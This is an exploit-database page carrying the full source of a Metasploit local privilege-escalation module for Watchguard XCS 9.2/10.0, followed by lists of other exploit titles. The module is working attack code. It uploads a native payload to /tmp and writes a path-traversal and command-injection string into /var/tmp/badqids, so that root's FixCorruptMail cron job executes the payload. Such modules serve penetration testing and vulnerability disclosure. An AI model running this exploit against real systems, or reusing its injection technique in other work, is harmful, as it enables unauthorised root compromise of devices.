Menu

Search for hundreds of thousands of exploits

"Watchguard XCS - FixCorruptMail Privilege Escalation (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

bsd

Release date

Exploit published date

2015-09-28

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'

class Metasploit4 < Msf::Exploit::Local
  # It needs 3 minutes wait time
  # WfsDelay set to 180, so it should be a Manual exploit,
  # to avoid it being included in automations
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
        by root's crontab which can be exploited to run a command as root within 3 minutes.
      },
      'Author'         =>
        [
          'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
        ],
      'Platform'       => 'bsd',
      'Arch'           => ARCH_X86_64,
      'SessionTypes'   => ['shell'],
      'Privileged'     => true,
      'Targets'        =>
        [
          [ 'Watchguard XCS 9.2/10.0', { }]
        ],
      'DefaultOptions' => { 'WfsDelay' => 180 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 29 2015'
    ))
  end

  def setup
    @pl = generate_payload_exe
    if @pl.nil?
      fail_with(Failure::BadConfig, 'Please select a native bsd payload')
    end

    super
  end

  def check
    #Basic check to see if the device is a Watchguard XCS
    res = cmd_exec('uname -a')
    return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')

    Exploit::CheckCode::Safe
  end

  def upload_payload
    fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"

    write_file(fname, @pl)
    return nil unless file_exist?(fname)
    cmd_exec("chmod +x #{fname}")

    fname
  end

  def exploit
    print_warning('Rooting can take up to 3 minutes.')

    #Generate and upload the payload
    filename = upload_payload
    fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
    print_status("Payload #{filename} uploaded.")

    #Sets up empty dummy file needed for privesc
    dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
    cmd_exec("touch #{dummy_filename}")
    vprint_status('Added dummy file')

    #Put the shell injection line into badqids
    #setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
    badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
    fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
    print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
    #cmd_exec(setup_privesc)

    #Cleanup the files we used
    register_file_for_cleanup('/var/tmp/badqids')
    register_file_for_cleanup(dummy_filename)
    register_file_for_cleanup(filename)
  end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-11-06 "Morris Worm - fingerd Stack Buffer Overflow (Metasploit)" remote bsd Metasploit
2016-07-21 "NetBSD - 'mail.local(8)' Local Privilege Escalation" local bsd akat1
2015-09-28 "Watchguard XCS - Remote Command Execution (Metasploit)" remote bsd Metasploit
2015-09-28 "Watchguard XCS - FixCorruptMail Privilege Escalation (Metasploit)" local bsd Metasploit
2015-04-21 "OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)" dos bsd nitr0us
2014-12-02 "tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side" remote bsd dash
2014-11-06 "Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)" remote bsd Metasploit
2014-10-25 "OpenBSD 5.5 - Local Kernel Panic (Denial of Service)" dos bsd nitr0us
2012-11-22 "OpenBSD 4.x - Portmap Remote Denial of Service" dos bsd auto236751
2012-07-01 "BSD - 'TelnetD' Remote Command Execution (2)" remote bsd kingcope
Release Date Title Type Platform Author
2020-05-25 "Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)" remote hardware Metasploit
2020-05-25 "Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)" remote windows Metasploit
2020-05-22 "WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)" remote multiple Metasploit
2020-05-19 "Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)" remote php Metasploit
2020-05-01 "Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)" remote multiple Metasploit
2020-04-28 "Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)" local windows Metasploit
2020-04-20 "Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)" remote linux Metasploit
2020-04-17 "Nexus Repository Manager - Java EL Injection RCE (Metasploit)" remote linux Metasploit
2020-04-16 "VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)" local macos Metasploit
2020-04-16 "Apache Solr - Remote Code Execution via Velocity Template (Metasploit)" remote multiple Metasploit
2020-04-16 "PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)" remote php Metasploit
2020-04-16 "TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)" remote linux_mips Metasploit
2020-04-16 "Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)" remote java Metasploit
2020-04-16 "DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2020-04-16 "ThinkPHP - Multiple PHP Injection RCEs (Metasploit)" remote linux Metasploit
2020-04-16 "Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)" remote linux Metasploit
2020-03-31 "SharePoint Workflows - XOML Injection (Metasploit)" remote windows Metasploit
2020-03-31 "DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)" remote hardware Metasploit
2020-03-31 "Redis - Replication Code Execution (Metasploit)" remote linux Metasploit
2020-03-31 "IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)" remote multiple Metasploit
2020-03-17 "Rconfig 3.x - Chained Remote Code Execution (Metasploit)" remote linux Metasploit
2020-03-17 "ManageEngine Desktop Central - Java Deserialization (Metasploit)" remote multiple Metasploit
2020-03-10 "PHPStudy - Backdoor Remote Code execution (Metasploit)" remote php Metasploit
2020-03-10 "Nagios XI - Authenticated Remote Command Execution (Metasploit)" remote linux Metasploit
2020-03-09 "PHP-FPM - Underflow Remote Code Execution (Metasploit)" remote php Metasploit
2020-03-09 "Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)" remote windows Metasploit
2020-03-09 "Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)" remote multiple Metasploit
2020-03-09 "OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)" local linux Metasploit
2020-03-09 "Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)" remote multiple Metasploit
2020-03-09 "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)" remote multiple Metasploit 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected